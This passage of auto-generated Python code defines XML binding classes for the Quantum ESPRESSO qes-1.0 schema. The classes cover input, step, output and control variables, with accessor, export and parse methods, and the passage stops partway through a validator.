class inputType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, control_variables=None, atomic_species=None, atomic_structure=None, dft=None, spin=None, bands=None, basis=None, electron_control=None, k_points_IBZ=None, ion_control=None, cell_control=None, symmetry_flags=None, boundary_conditions=None, ekin_functional=None, external_atomic_forces=None, free_positions=None, starting_atomic_velocities=None, electric_field=None, atomic_constraints=None, spin_constraints=None):
self.original_tagname_ = None
self.control_variables = control_variables
self.atomic_species = atomic_species
self.atomic_structure = atomic_structure
self.dft = dft
self.spin = spin
self.bands = bands
self.basis = basis
self.electron_control = electron_control
self.k_points_IBZ = k_points_IBZ
self.ion_control = ion_control
self.cell_control = cell_control
self.symmetry_flags = symmetry_flags
self.boundary_conditions = boundary_conditions
self.ekin_functional = ekin_functional
self.external_atomic_forces = external_atomic_forces
self.free_positions = free_positions
self.starting_atomic_velocities = starting_atomic_velocities
self.electric_field = electric_field
self.atomic_constraints = atomic_constraints
self.spin_constraints = spin_constraints
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, inputType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if inputType.subclass:
return inputType.subclass(*args_, **kwargs_)
else:
return inputType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_control_variables(self): return self.control_variables
def set_control_variables(self, control_variables): self.control_variables = control_variables
def get_atomic_species(self): return self.atomic_species
def set_atomic_species(self, atomic_species): self.atomic_species = atomic_species
def get_atomic_structure(self): return self.atomic_structure
def set_atomic_structure(self, atomic_structure): self.atomic_structure = atomic_structure
def get_dft(self): return self.dft
def set_dft(self, dft): self.dft = dft
def get_spin(self): return self.spin
def set_spin(self, spin): self.spin = spin
def get_bands(self): return self.bands
def set_bands(self, bands): self.bands = bands
def get_basis(self): return self.basis
def set_basis(self, basis): self.basis = basis
def get_electron_control(self): return self.electron_control
def set_electron_control(self, electron_control): self.electron_control = electron_control
def get_k_points_IBZ(self): return self.k_points_IBZ
def set_k_points_IBZ(self, k_points_IBZ): self.k_points_IBZ = k_points_IBZ
def get_ion_control(self): return self.ion_control
def set_ion_control(self, ion_control): self.ion_control = ion_control
def get_cell_control(self): return self.cell_control
def set_cell_control(self, cell_control): self.cell_control = cell_control
def get_symmetry_flags(self): return self.symmetry_flags
def set_symmetry_flags(self, symmetry_flags): self.symmetry_flags = symmetry_flags
def get_boundary_conditions(self): return self.boundary_conditions
def set_boundary_conditions(self, boundary_conditions): self.boundary_conditions = boundary_conditions
def get_ekin_functional(self): return self.ekin_functional
def set_ekin_functional(self, ekin_functional): self.ekin_functional = ekin_functional
def get_external_atomic_forces(self): return self.external_atomic_forces
def set_external_atomic_forces(self, external_atomic_forces): self.external_atomic_forces = external_atomic_forces
def get_free_positions(self): return self.free_positions
def set_free_positions(self, free_positions): self.free_positions = free_positions
def get_starting_atomic_velocities(self): return self.starting_atomic_velocities
def set_starting_atomic_velocities(self, starting_atomic_velocities): self.starting_atomic_velocities = starting_atomic_velocities
def get_electric_field(self): return self.electric_field
def set_electric_field(self, electric_field): self.electric_field = electric_field
def get_atomic_constraints(self): return self.atomic_constraints
def set_atomic_constraints(self, atomic_constraints): self.atomic_constraints = atomic_constraints
def get_spin_constraints(self): return self.spin_constraints
def set_spin_constraints(self, spin_constraints): self.spin_constraints = spin_constraints
def hasContent_(self):
if (
self.control_variables is not None or
self.atomic_species is not None or
self.atomic_structure is not None or
self.dft is not None or
self.spin is not None or
self.bands is not None or
self.basis is not None or
self.electron_control is not None or
self.k_points_IBZ is not None or
self.ion_control is not None or
self.cell_control is not None or
self.symmetry_flags is not None or
self.boundary_conditions is not None or
self.ekin_functional is not None or
self.external_atomic_forces is not None or
self.free_positions is not None or
self.starting_atomic_velocities is not None or
self.electric_field is not None or
self.atomic_constraints is not None or
self.spin_constraints is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='inputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('inputType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='inputType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='inputType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='inputType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='inputType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.control_variables is not None:
self.control_variables.export(outfile, level, namespaceprefix_, name_='control_variables', pretty_print=pretty_print)
if self.atomic_species is not None:
self.atomic_species.export(outfile, level, namespaceprefix_, name_='atomic_species', pretty_print=pretty_print)
if self.atomic_structure is not None:
self.atomic_structure.export(outfile, level, namespaceprefix_, name_='atomic_structure', pretty_print=pretty_print)
if self.dft is not None:
self.dft.export(outfile, level, namespaceprefix_, name_='dft', pretty_print=pretty_print)
if self.spin is not None:
self.spin.export(outfile, level, namespaceprefix_, name_='spin', pretty_print=pretty_print)
if self.bands is not None:
self.bands.export(outfile, level, namespaceprefix_, name_='bands', pretty_print=pretty_print)
if self.basis is not None:
self.basis.export(outfile, level, namespaceprefix_, name_='basis', pretty_print=pretty_print)
if self.electron_control is not None:
self.electron_control.export(outfile, level, namespaceprefix_, name_='electron_control', pretty_print=pretty_print)
if self.k_points_IBZ is not None:
self.k_points_IBZ.export(outfile, level, namespaceprefix_, name_='k_points_IBZ', pretty_print=pretty_print)
if self.ion_control is not None:
self.ion_control.export(outfile, level, namespaceprefix_, name_='ion_control', pretty_print=pretty_print)
if self.cell_control is not None:
self.cell_control.export(outfile, level, namespaceprefix_, name_='cell_control', pretty_print=pretty_print)
if self.symmetry_flags is not None:
self.symmetry_flags.export(outfile, level, namespaceprefix_, name_='symmetry_flags', pretty_print=pretty_print)
if self.boundary_conditions is not None:
self.boundary_conditions.export(outfile, level, namespaceprefix_, name_='boundary_conditions', pretty_print=pretty_print)
if self.ekin_functional is not None:
self.ekin_functional.export(outfile, level, namespaceprefix_, name_='ekin_functional', pretty_print=pretty_print)
if self.external_atomic_forces is not None:
self.external_atomic_forces.export(outfile, level, namespaceprefix_, name_='external_atomic_forces', pretty_print=pretty_print)
if self.free_positions is not None:
self.free_positions.export(outfile, level, namespaceprefix_, name_='free_positions', pretty_print=pretty_print)
if self.starting_atomic_velocities is not None:
self.starting_atomic_velocities.export(outfile, level, namespaceprefix_, name_='starting_atomic_velocities', pretty_print=pretty_print)
if self.electric_field is not None:
self.electric_field.export(outfile, level, namespaceprefix_, name_='electric_field', pretty_print=pretty_print)
if self.atomic_constraints is not None:
self.atomic_constraints.export(outfile, level, namespaceprefix_, name_='atomic_constraints', pretty_print=pretty_print)
if self.spin_constraints is not None:
self.spin_constraints.export(outfile, level, namespaceprefix_, name_='spin_constraints', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'control_variables':
obj_ = control_variablesType.factory()
obj_.build(child_)
self.control_variables = obj_
obj_.original_tagname_ = 'control_variables'
elif nodeName_ == 'atomic_species':
obj_ = atomic_speciesType.factory()
obj_.build(child_)
self.atomic_species = obj_
obj_.original_tagname_ = 'atomic_species'
elif nodeName_ == 'atomic_structure':
obj_ = atomic_structureType.factory()
obj_.build(child_)
self.atomic_structure = obj_
obj_.original_tagname_ = 'atomic_structure'
elif nodeName_ == 'dft':
obj_ = dftType.factory()
obj_.build(child_)
self.dft = obj_
obj_.original_tagname_ = 'dft'
elif nodeName_ == 'spin':
obj_ = spinType.factory()
obj_.build(child_)
self.spin = obj_
obj_.original_tagname_ = 'spin'
elif nodeName_ == 'bands':
obj_ = bandsType.factory()
obj_.build(child_)
self.bands = obj_
obj_.original_tagname_ = 'bands'
elif nodeName_ == 'basis':
obj_ = basisType.factory()
obj_.build(child_)
self.basis = obj_
obj_.original_tagname_ = 'basis'
elif nodeName_ == 'electron_control':
obj_ = electron_controlType.factory()
obj_.build(child_)
self.electron_control = obj_
obj_.original_tagname_ = 'electron_control'
elif nodeName_ == 'k_points_IBZ':
obj_ = k_points_IBZType.factory()
obj_.build(child_)
self.k_points_IBZ = obj_
obj_.original_tagname_ = 'k_points_IBZ'
elif nodeName_ == 'ion_control':
obj_ = ion_controlType.factory()
obj_.build(child_)
self.ion_control = obj_
obj_.original_tagname_ = 'ion_control'
elif nodeName_ == 'cell_control':
obj_ = cell_controlType.factory()
obj_.build(child_)
self.cell_control = obj_
obj_.original_tagname_ = 'cell_control'
elif nodeName_ == 'symmetry_flags':
obj_ = symmetry_flagsType.factory()
obj_.build(child_)
self.symmetry_flags = obj_
obj_.original_tagname_ = 'symmetry_flags'
elif nodeName_ == 'boundary_conditions':
obj_ = boundary_conditionsType.factory()
obj_.build(child_)
self.boundary_conditions = obj_
obj_.original_tagname_ = 'boundary_conditions'
elif nodeName_ == 'ekin_functional':
obj_ = ekin_functionalType.factory()
obj_.build(child_)
self.ekin_functional = obj_
obj_.original_tagname_ = 'ekin_functional'
elif nodeName_ == 'external_atomic_forces':
class_obj_ = self.get_class_obj_(child_, matrixType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.external_atomic_forces = obj_
obj_.original_tagname_ = 'external_atomic_forces'
elif nodeName_ == 'free_positions':
obj_ = integerMatrixType.factory()
obj_.build(child_)
self.free_positions = obj_
obj_.original_tagname_ = 'free_positions'
elif nodeName_ == 'starting_atomic_velocities':
class_obj_ = self.get_class_obj_(child_, matrixType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.starting_atomic_velocities = obj_
obj_.original_tagname_ = 'starting_atomic_velocities'
elif nodeName_ == 'electric_field':
obj_ = electric_fieldType.factory()
obj_.build(child_)
self.electric_field = obj_
obj_.original_tagname_ = 'electric_field'
elif nodeName_ == 'atomic_constraints':
obj_ = atomic_constraintsType.factory()
obj_.build(child_)
self.atomic_constraints = obj_
obj_.original_tagname_ = 'atomic_constraints'
elif nodeName_ == 'spin_constraints':
obj_ = spin_constraintsType.factory()
obj_.build(child_)
self.spin_constraints = obj_
obj_.original_tagname_ = 'spin_constraints'
# end class inputType
class stepType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, n_step=None, scf_conv=None, atomic_structure=None, total_energy=None, forces=None, stress=None, FCP_force=None, FCP_tot_charge=None):
self.original_tagname_ = None
self.n_step = _cast(int, n_step)
self.scf_conv = scf_conv
self.atomic_structure = atomic_structure
self.total_energy = total_energy
self.forces = forces
self.stress = stress
self.FCP_force = FCP_force
self.FCP_tot_charge = FCP_tot_charge
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, stepType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if stepType.subclass:
return stepType.subclass(*args_, **kwargs_)
else:
return stepType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_scf_conv(self): return self.scf_conv
def set_scf_conv(self, scf_conv): self.scf_conv = scf_conv
def get_atomic_structure(self): return self.atomic_structure
def set_atomic_structure(self, atomic_structure): self.atomic_structure = atomic_structure
def get_total_energy(self): return self.total_energy
def set_total_energy(self, total_energy): self.total_energy = total_energy
def get_forces(self): return self.forces
def set_forces(self, forces): self.forces = forces
def get_stress(self): return self.stress
def set_stress(self, stress): self.stress = stress
def get_FCP_force(self): return self.FCP_force
def set_FCP_force(self, FCP_force): self.FCP_force = FCP_force
def get_FCP_tot_charge(self): return self.FCP_tot_charge
def set_FCP_tot_charge(self, FCP_tot_charge): self.FCP_tot_charge = FCP_tot_charge
def get_n_step(self): return self.n_step
def set_n_step(self, n_step): self.n_step = n_step
def hasContent_(self):
if (
self.scf_conv is not None or
self.atomic_structure is not None or
self.total_energy is not None or
self.forces is not None or
self.stress is not None or
self.FCP_force is not None or
self.FCP_tot_charge is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='stepType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('stepType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='stepType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='stepType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='stepType'):
if self.n_step is not None and 'n_step' not in already_processed:
already_processed.add('n_step')
outfile.write(' n_step="%s"' % self.gds_format_integer(self.n_step, input_name='n_step'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='stepType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.scf_conv is not None:
self.scf_conv.export(outfile, level, namespaceprefix_, name_='scf_conv', pretty_print=pretty_print)
if self.atomic_structure is not None:
self.atomic_structure.export(outfile, level, namespaceprefix_, name_='atomic_structure', pretty_print=pretty_print)
if self.total_energy is not None:
self.total_energy.export(outfile, level, namespaceprefix_, name_='total_energy', pretty_print=pretty_print)
if self.forces is not None:
self.forces.export(outfile, level, namespaceprefix_, name_='forces', pretty_print=pretty_print)
if self.stress is not None:
self.stress.export(outfile, level, namespaceprefix_, name_='stress', pretty_print=pretty_print)
if self.FCP_force is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:FCP_force>%s</qes:FCP_force>%s' % (self.gds_format_double(self.FCP_force, input_name='FCP_force'), eol_))
if self.FCP_tot_charge is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:FCP_tot_charge>%s</qes:FCP_tot_charge>%s' % (self.gds_format_double(self.FCP_tot_charge, input_name='FCP_tot_charge'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('n_step', node)
if value is not None and 'n_step' not in already_processed:
already_processed.add('n_step')
try:
self.n_step = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.n_step <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'scf_conv':
obj_ = scf_convType.factory()
obj_.build(child_)
self.scf_conv = obj_
obj_.original_tagname_ = 'scf_conv'
elif nodeName_ == 'atomic_structure':
obj_ = atomic_structureType.factory()
obj_.build(child_)
self.atomic_structure = obj_
obj_.original_tagname_ = 'atomic_structure'
elif nodeName_ == 'total_energy':
obj_ = total_energyType.factory()
obj_.build(child_)
self.total_energy = obj_
obj_.original_tagname_ = 'total_energy'
elif nodeName_ == 'forces':
class_obj_ = self.get_class_obj_(child_, matrixType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.forces = obj_
obj_.original_tagname_ = 'forces'
elif nodeName_ == 'stress':
class_obj_ = self.get_class_obj_(child_, matrixType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.stress = obj_
obj_.original_tagname_ = 'stress'
elif nodeName_ == 'FCP_force' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'FCP_force')
self.FCP_force = fval_
elif nodeName_ == 'FCP_tot_charge' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'FCP_tot_charge')
self.FCP_tot_charge = fval_
# end class stepType
class outputType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, convergence_info=None, algorithmic_info=None, atomic_species=None, atomic_structure=None, symmetries=None, basis_set=None, dft=None, boundary_conditions=None, magnetization=None, total_energy=None, band_structure=None, forces=None, stress=None, electric_field=None, FCP_force=None, FCP_tot_charge=None):
self.original_tagname_ = None
self.convergence_info = convergence_info
self.algorithmic_info = algorithmic_info
self.atomic_species = atomic_species
self.atomic_structure = atomic_structure
self.symmetries = symmetries
self.basis_set = basis_set
self.dft = dft
self.boundary_conditions = boundary_conditions
self.magnetization = magnetization
self.total_energy = total_energy
self.band_structure = band_structure
self.forces = forces
self.stress = stress
self.electric_field = electric_field
self.FCP_force = FCP_force
self.FCP_tot_charge = FCP_tot_charge
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, outputType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if outputType.subclass:
return outputType.subclass(*args_, **kwargs_)
else:
return outputType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_convergence_info(self): return self.convergence_info
def set_convergence_info(self, convergence_info): self.convergence_info = convergence_info
def get_algorithmic_info(self): return self.algorithmic_info
def set_algorithmic_info(self, algorithmic_info): self.algorithmic_info = algorithmic_info
def get_atomic_species(self): return self.atomic_species
def set_atomic_species(self, atomic_species): self.atomic_species = atomic_species
def get_atomic_structure(self): return self.atomic_structure
def set_atomic_structure(self, atomic_structure): self.atomic_structure = atomic_structure
def get_symmetries(self): return self.symmetries
def set_symmetries(self, symmetries): self.symmetries = symmetries
def get_basis_set(self): return self.basis_set
def set_basis_set(self, basis_set): self.basis_set = basis_set
def get_dft(self): return self.dft
def set_dft(self, dft): self.dft = dft
def get_boundary_conditions(self): return self.boundary_conditions
def set_boundary_conditions(self, boundary_conditions): self.boundary_conditions = boundary_conditions
def get_magnetization(self): return self.magnetization
def set_magnetization(self, magnetization): self.magnetization = magnetization
def get_total_energy(self): return self.total_energy
def set_total_energy(self, total_energy): self.total_energy = total_energy
def get_band_structure(self): return self.band_structure
def set_band_structure(self, band_structure): self.band_structure = band_structure
def get_forces(self): return self.forces
def set_forces(self, forces): self.forces = forces
def get_stress(self): return self.stress
def set_stress(self, stress): self.stress = stress
def get_electric_field(self): return self.electric_field
def set_electric_field(self, electric_field): self.electric_field = electric_field
def get_FCP_force(self): return self.FCP_force
def set_FCP_force(self, FCP_force): self.FCP_force = FCP_force
def get_FCP_tot_charge(self): return self.FCP_tot_charge
def set_FCP_tot_charge(self, FCP_tot_charge): self.FCP_tot_charge = FCP_tot_charge
def hasContent_(self):
if (
self.convergence_info is not None or
self.algorithmic_info is not None or
self.atomic_species is not None or
self.atomic_structure is not None or
self.symmetries is not None or
self.basis_set is not None or
self.dft is not None or
self.boundary_conditions is not None or
self.magnetization is not None or
self.total_energy is not None or
self.band_structure is not None or
self.forces is not None or
self.stress is not None or
self.electric_field is not None or
self.FCP_force is not None or
self.FCP_tot_charge is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='outputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('outputType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='outputType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='outputType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='outputType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='outputType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.convergence_info is not None:
self.convergence_info.export(outfile, level, namespaceprefix_, name_='convergence_info', pretty_print=pretty_print)
if self.algorithmic_info is not None:
self.algorithmic_info.export(outfile, level, namespaceprefix_, name_='algorithmic_info', pretty_print=pretty_print)
if self.atomic_species is not None:
self.atomic_species.export(outfile, level, namespaceprefix_, name_='atomic_species', pretty_print=pretty_print)
if self.atomic_structure is not None:
self.atomic_structure.export(outfile, level, namespaceprefix_, name_='atomic_structure', pretty_print=pretty_print)
if self.symmetries is not None:
self.symmetries.export(outfile, level, namespaceprefix_, name_='symmetries', pretty_print=pretty_print)
if self.basis_set is not None:
self.basis_set.export(outfile, level, namespaceprefix_, name_='basis_set', pretty_print=pretty_print)
if self.dft is not None:
self.dft.export(outfile, level, namespaceprefix_, name_='dft', pretty_print=pretty_print)
if self.boundary_conditions is not None:
self.boundary_conditions.export(outfile, level, namespaceprefix_, name_='boundary_conditions', pretty_print=pretty_print)
if self.magnetization is not None:
self.magnetization.export(outfile, level, namespaceprefix_, name_='magnetization', pretty_print=pretty_print)
if self.total_energy is not None:
self.total_energy.export(outfile, level, namespaceprefix_, name_='total_energy', pretty_print=pretty_print)
if self.band_structure is not None:
self.band_structure.export(outfile, level, namespaceprefix_, name_='band_structure', pretty_print=pretty_print)
if self.forces is not None:
self.forces.export(outfile, level, namespaceprefix_, name_='forces', pretty_print=pretty_print)
if self.stress is not None:
self.stress.export(outfile, level, namespaceprefix_, name_='stress', pretty_print=pretty_print)
if self.electric_field is not None:
self.electric_field.export(outfile, level, namespaceprefix_, name_='electric_field', pretty_print=pretty_print)
if self.FCP_force is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:FCP_force>%s</qes:FCP_force>%s' % (self.gds_format_double(self.FCP_force, input_name='FCP_force'), eol_))
if self.FCP_tot_charge is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:FCP_tot_charge>%s</qes:FCP_tot_charge>%s' % (self.gds_format_double(self.FCP_tot_charge, input_name='FCP_tot_charge'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'convergence_info':
obj_ = convergence_infoType.factory()
obj_.build(child_)
self.convergence_info = obj_
obj_.original_tagname_ = 'convergence_info'
elif nodeName_ == 'algorithmic_info':
obj_ = algorithmic_infoType.factory()
obj_.build(child_)
self.algorithmic_info = obj_
obj_.original_tagname_ = 'algorithmic_info'
elif nodeName_ == 'atomic_species':
obj_ = atomic_speciesType.factory()
obj_.build(child_)
self.atomic_species = obj_
obj_.original_tagname_ = 'atomic_species'
elif nodeName_ == 'atomic_structure':
obj_ = atomic_structureType.factory()
obj_.build(child_)
self.atomic_structure = obj_
obj_.original_tagname_ = 'atomic_structure'
elif nodeName_ == 'symmetries':
obj_ = symmetriesType.factory()
obj_.build(child_)
self.symmetries = obj_
obj_.original_tagname_ = 'symmetries'
elif nodeName_ == 'basis_set':
obj_ = basis_setType.factory()
obj_.build(child_)
self.basis_set = obj_
obj_.original_tagname_ = 'basis_set'
elif nodeName_ == 'dft':
obj_ = dftType.factory()
obj_.build(child_)
self.dft = obj_
obj_.original_tagname_ = 'dft'
elif nodeName_ == 'boundary_conditions':
obj_ = outputPBCType.factory()
obj_.build(child_)
self.boundary_conditions = obj_
obj_.original_tagname_ = 'boundary_conditions'
elif nodeName_ == 'magnetization':
obj_ = magnetizationType.factory()
obj_.build(child_)
self.magnetization = obj_
obj_.original_tagname_ = 'magnetization'
elif nodeName_ == 'total_energy':
obj_ = total_energyType.factory()
obj_.build(child_)
self.total_energy = obj_
obj_.original_tagname_ = 'total_energy'
elif nodeName_ == 'band_structure':
obj_ = band_structureType.factory()
obj_.build(child_)
self.band_structure = obj_
obj_.original_tagname_ = 'band_structure'
elif nodeName_ == 'forces':
class_obj_ = self.get_class_obj_(child_, matrixType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.forces = obj_
obj_.original_tagname_ = 'forces'
elif nodeName_ == 'stress':
class_obj_ = self.get_class_obj_(child_, matrixType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.stress = obj_
obj_.original_tagname_ = 'stress'
elif nodeName_ == 'electric_field':
obj_ = outputElectricFieldType.factory()
obj_.build(child_)
self.electric_field = obj_
obj_.original_tagname_ = 'electric_field'
elif nodeName_ == 'FCP_force' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'FCP_force')
self.FCP_force = fval_
elif nodeName_ == 'FCP_tot_charge' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'FCP_tot_charge')
self.FCP_tot_charge = fval_
# end class outputType
class control_variablesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, title=None, calculation='scf', restart_mode='from_scratch', prefix=None, pseudo_dir=None, outdir=None, stress=None, forces=None, wf_collect=False, disk_io='low', max_seconds=None, nstep=None, etot_conv_thr=1.0e-5, forc_conv_thr=1.0e-3, press_conv_thr=5e-1, verbosity='low', print_every=None):
self.original_tagname_ = None
self.title = title
self.calculation = calculation
self.validate_calculationType(self.calculation)
self.restart_mode = restart_mode
self.validate_controlRestartModeType(self.restart_mode)
self.prefix = prefix
self.pseudo_dir = pseudo_dir
self.outdir = outdir
self.stress = stress
self.forces = forces
self.wf_collect = wf_collect
self.disk_io = disk_io
self.validate_lowhighType(self.disk_io)
self.max_seconds = max_seconds
self.nstep = nstep
self.etot_conv_thr = etot_conv_thr
self.forc_conv_thr = forc_conv_thr
self.press_conv_thr = press_conv_thr
self.verbosity = verbosity
self.validate_lowhighType(self.verbosity)
self.print_every = print_every
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, control_variablesType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if control_variablesType.subclass:
return control_variablesType.subclass(*args_, **kwargs_)
else:
return control_variablesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def get_calculation(self): return self.calculation
def set_calculation(self, calculation): self.calculation = calculation
def get_restart_mode(self): return self.restart_mode
def set_restart_mode(self, restart_mode): self.restart_mode = restart_mode
def get_prefix(self): return self.prefix
def set_prefix(self, prefix): self.prefix = prefix
def get_pseudo_dir(self): return self.pseudo_dir
def set_pseudo_dir(self, pseudo_dir): self.pseudo_dir = pseudo_dir
def get_outdir(self): return self.outdir
def set_outdir(self, outdir): self.outdir = outdir
def get_stress(self): return self.stress
def set_stress(self, stress): self.stress = stress
def get_forces(self): return self.forces
def set_forces(self, forces): self.forces = forces
def get_wf_collect(self): return self.wf_collect
def set_wf_collect(self, wf_collect): self.wf_collect = wf_collect
def get_disk_io(self): return self.disk_io
def set_disk_io(self, disk_io): self.disk_io = disk_io
def get_max_seconds(self): return self.max_seconds
def set_max_seconds(self, max_seconds): self.max_seconds = max_seconds
def get_nstep(self): return self.nstep
def set_nstep(self, nstep): self.nstep = nstep
def get_etot_conv_thr(self): return self.etot_conv_thr
def set_etot_conv_thr(self, etot_conv_thr): self.etot_conv_thr = etot_conv_thr
def get_forc_conv_thr(self): return self.forc_conv_thr
def set_forc_conv_thr(self, forc_conv_thr): self.forc_conv_thr = forc_conv_thr
def get_press_conv_thr(self): return self.press_conv_thr
def set_press_conv_thr(self, press_conv_thr): self.press_conv_thr = press_conv_thr
def get_verbosity(self): return self.verbosity
def set_verbosity(self, verbosity): self.verbosity = verbosity
def get_print_every(self): return self.print_every
def set_print_every(self, print_every): self.print_every = print_every
def validate_calculationType(self, value):
# Validate type calculationType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['scf', 'nscf', 'bands', 'relax', 'vc-relax', 'md', 'vc-md']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on calculationType' % {"value" : value.encode("utf-8")} )
def validate_controlRestartModeType(self, value):
# Validate type controlRestartModeType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
